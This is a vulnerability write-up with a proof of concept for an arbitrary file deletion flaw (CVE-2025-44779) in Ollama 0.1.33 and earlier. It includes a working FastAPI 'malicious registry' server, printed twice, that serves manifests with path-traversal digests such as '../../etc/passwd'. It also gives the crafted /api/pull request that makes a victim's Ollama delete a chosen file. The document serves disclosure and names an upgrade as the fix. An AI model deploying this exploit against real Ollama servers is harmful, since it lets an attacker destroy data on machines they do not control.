CVEID: CVE-2025-44779

Vulnerability type: Incorrect Access Control

Affected versions: Ollama <= 0.1.33

Description: In Ollama versions <= 0.1.33, if a file already exists at the path where a digest is to be saved, the file is treated as having a mismatched digest value and is therefore deleted.

Author: a1batr0ss

Remediation: Upgrade Ollama to version 0.1.34 or later

What is Ollama?

Ollama is a lightweight, user-friendly platform designed to run and manage large language models locally on personal machines. It allows users to easily download, configure, and interact with powerful AI models like LLaMA and Mistral without needing cloud infrastructure. Ollama is particularly popular among developers and researchers who want more control over their AI workflows, data privacy, and system performance. Its streamlined interface and local-first approach make it an ideal choice for experimenting with and deploying generative AI applications in secure, offline environments.

1

Ollama’s HTTP server exposes multiple API endpoints, each performing different operations. The specific functions of these endpoints are illustrated in the diagram below.

image-20250317195119032

Deploy version 0.1.33 of Ollama using Docker with a single command:

1
docker run -d --name ollama -p 11434:11434 ollama/ollama:0.1.33

image-20250806100636798

Manifest file

According to Ollama’s mechanism, the /api/pull endpoint can, by default, pull images from the official Ollama registry. However, it is also possible to pull images from a self-hosted private server. After research, it was found that by specifying the following parameters during the pull request, images can be retrieved from a private server instead.

  • 10.211.55.3:11434 is the address of the Ollama client.
  • 192.168.200.237 is the address of the custom private server.
1
2
3
4
5
6
7
8
9
POST /api/pull HTTP/1.1
Host: 10.211.55.3:11434
Content-Type: application/json
Content-Length: 77

{
"name": "192.168.200.237/tianweng-anquan/a1batr0ss",
"insecure": true
}

Let’s first use FastAPI to set up a private server and see what happens when we send the above request package.

1
2
3
4
5
6
7
from fastapi import FastAPI, Request, Response

app = FastAPI()

if __name__ == "__main__":
import uvicorn
uvicorn.run(app, host='0.0.0.0', port=80)

We found that the response packet reported an error: the manifest file was not found when pulling the image. (This is Ollama’s mechanism: when you run ollama pull <model>, the Ollama client first sends a request to the registry server to query the metadata of the model.)

image-20250317183351201

The server also reported an error showing an address: /v2/tianweng-anquan/a1batr0ss/manifests/latest. This address must be the manifest URL requested from the registry server.

image-20250806102001137

We cannot avoid discussing the manifest file here. Below is a typical manifest file:

  • config (container configuration layer): Stores metadata of the Docker container, including runtime configuration, environment variables, Entrypoint, CMD, working directory, and so on.
  • layers (image layer data): Stores the filesystem layers (RootFS) of the Docker image. Each layer represents a file change, such as the result of a COPY or RUN instruction.
  • digest: The original purpose of digest is to verify the hashes of the config and layers sections.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
{
"schemaVersion": 2,
"mediaType": "application/vnd.docker.distribution.manifest.v2+json",
"config": {
"mediaType": "application/vnd.docker.container.image.v1+json",
"digest": "sha256:9c46aefae6c6d1e9c1c1b25b8a6f8e67a10bffbdf1b5a82842a527776b8f447a",
"size": 7023
},
"layers": [
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"digest": "sha256:3a2e9a64b4e5e2b77f9a6f2bb2e9235db934e6d3a9c0b1d3837cd8b24d3f6dfb",
"size": 2794576
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"digest": "sha256:5b8c05cddf924c0c3e5f5a5e3f0b4a2c1b96a8a5ff8b2e99a3d5372c5f1e3a28",
"size": 1484567
}
]
}

Construct a malicious server

We have discovered that before pulling an image, the Ollama client first sends a request to the malicious registry server’s /v2/tianweng-anquan/a1batr0ss/manifests/latest endpoint to retrieve metadata (i.e., the manifest file).

Through our research, we found that the Ollama client iterates over each digest value in the layers section of the metadata to request and verify them, and then attempts to save them (note that the first digest in the layers section is not saved completely).

Interestingly, according to Ollama’s mechanism, during the saving process of a digest, if a file already exists at the target path, Ollama will throw a digest mismatch error. While reporting the error, it will also delete the existing file at that path.

image-20250806112940904

Based on the above principle, we can construct a malicious server accordingly.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from fastapi import FastAPI, Request, Response

app = FastAPI()

@app.get("/v2/tianweng-anquan/a1batr0ss/manifests/latest")
async def evilManifest():
return {"schemaVersion":2,"mediaType":"application/vnd.docker.distribution.manifest.v2+json","config":{"mediaType":"application/vnd.docker.container.image.v1+json","digest":"../../../../../../../../../../../../../etc/passwd","size":10},"layers":[{"mediaType":"application/vnd.docker.distribution.manifest.v2+json","digest":"../../../../../../../../../../../../../file/targetFile","size":10}]}


@app.head("/file/targetFile")
async def fake_notfound_head(response: Response):
response.headers["Docker-Content-Digest"] = "../../../../../../../../../../../../../file/targetFile"
return ''

@app.get("/file/targetFile", status_code=206)
async def fake_notfound_get(response: Response):
response.headers["Docker-Content-Digest"] = "../../../../../../../../../../../../../file/targetFile"
response.headers["E-Tag"] = "\"../../../../../../../../../../../../../file/targetFile\""
return 'Deleted'


if __name__ == "__main__":
import uvicorn
uvicorn.run(app, host='0.0.0.0', port=80)

Proof of Concept (POC)

Create the /file/targetFile file on the Ollama server.

image-20250317135521783

Deploy a malicious server disguised as a private registry server.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from fastapi import FastAPI, Request, Response

app = FastAPI()

@app.get("/v2/tianweng-anquan/a1batr0ss/manifests/latest")
async def evilManifest():
return {"schemaVersion":2,"mediaType":"application/vnd.docker.distribution.manifest.v2+json","config":{"mediaType":"application/vnd.docker.container.image.v1+json","digest":"../../../../../../../../../../../../../etc/passwd","size":10},"layers":[{"mediaType":"application/vnd.docker.distribution.manifest.v2+json","digest":"../../../../../../../../../../../../../file/targetFile","size":10}]}


@app.head("/file/targetFile")
async def fake_notfound_head(response: Response):
response.headers["Docker-Content-Digest"] = "../../../../../../../../../../../../../file/targetFile"
return ''

@app.get("/file/targetFile", status_code=206)
async def fake_notfound_get(response: Response):
response.headers["Docker-Content-Digest"] = "../../../../../../../../../../../../../file/targetFile"
response.headers["E-Tag"] = "\"../../../../../../../../../../../../../file/targetFile\""
return 'Deleted'


if __name__ == "__main__":
import uvicorn
uvicorn.run(app, host='0.0.0.0', port=80)

image-20250317134635614

Send a crafted data packet to the /api/pull endpoint, where 10.211.55.3:11434 is the Ollama service address, and 192.168.200.237 is the address of the crafted malicious server.

image-20250806114731697

image-20250806115025717

Check the /file/targetFile file on the Ollama server again and find that it has been deleted.

image-20250806114758487